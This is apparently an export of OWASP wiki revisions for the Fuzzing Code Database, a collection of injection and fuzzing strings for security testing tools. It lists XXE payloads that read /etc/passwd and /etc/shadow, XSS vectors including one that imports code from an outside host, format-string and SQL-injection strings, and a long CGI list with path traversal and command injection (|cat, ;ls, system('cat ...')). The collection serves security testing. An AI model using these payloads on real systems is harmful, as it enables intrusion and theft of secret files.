&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80076</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80076"/>
				<updated>2010-03-17T21:09:30Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Windows Directory Traversal   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
